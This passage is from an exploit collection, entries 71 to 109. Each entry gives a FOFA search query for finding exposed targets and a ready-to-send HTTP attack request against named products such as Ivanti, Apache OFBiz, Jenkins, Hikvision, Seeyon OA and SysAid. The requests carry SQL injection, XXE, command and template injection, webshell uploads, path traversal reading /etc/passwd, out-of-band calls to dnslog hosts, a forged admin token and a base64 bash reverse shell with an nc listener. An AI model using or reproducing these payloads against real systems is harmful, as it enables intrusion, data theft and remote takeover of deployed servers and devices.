User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远 OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远 M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普 掌上校园 service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 garment management software system UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction engineering quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为 flow-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password leak
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is as follows; it plants a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒 明御 security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联 FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视 IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视 operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. 奇安信网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 value of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Replace the placeholder in the PoC above with the generated payload:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast 盈可视 HD smart recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the following XML document:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

